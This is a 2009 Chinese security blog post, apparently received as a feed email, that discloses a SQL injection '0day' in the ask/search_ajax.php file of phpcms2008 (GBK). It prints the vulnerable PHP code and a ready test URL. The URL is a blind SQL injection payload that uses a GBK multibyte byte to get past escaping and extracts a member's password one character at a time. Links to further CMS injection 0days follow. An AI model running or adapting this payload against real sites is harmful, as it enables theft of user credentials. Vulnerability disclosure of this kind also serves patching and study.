phpcms2008-0day ask/search_ajax.php-鬼仔's Blog

来自"鬼仔's Blog"的最新文章，如果您不希望再收到此邮件，请退订；如果您需要更换其它邮箱接收邮件，请点击这里！

Fuck The World!

phpcms2008-0day ask/search_ajax.php

Sun, 15 Mar 2009 22:35:59 +0800

作者：nuke

受影响程序： phpcms2008 gbk

漏洞文件：ask/search_ajax.php

code：

<?php require './include/common.inc.php'; require_once MOD_ROOT.'include/ask.class.php'; $ask = new ask(); header('Content-type: text/html; charset=utf-8'); if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q); if($q) { $where = " title LIKE '%$q%' AND status = 5"; } else { exit('null'); } $infos = $ask->listinfo($where, 'askid DESC', '', 10);  foreach($infos as $key=>$val) { $val['title'] = str_replace($q, '<span class="c_orange">'.$q.'</span>', $val['title']); $info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title']; $info[$key]['url'] = $val['url']; }  echo(json_encode($info)); ?>

测试方法：
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

---

发表评论 | 分类：技术文章

© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/2928.html

相关日志

• PhpCms2007 sp6 SQL injection 0day (wenba) (3)
• phpcms injection 三八贺岁 0day (0)
• PHPCMS2007 SP6 vote模块SQL注射漏洞 (0)
• PhpCms2007 sp6 SQL injection 0day (0)
• 马克斯CMS2.0beta (maxcms)SQL注入漏洞 (4)

返回顶部

您可以直接回复此邮件与作者联系，该服务由Feedsky提供技术支持，祝您使用愉快